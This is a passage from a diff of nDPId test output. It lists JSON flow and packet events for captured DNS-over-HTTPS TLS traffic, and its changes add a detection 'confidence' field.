rHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"}
-00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9D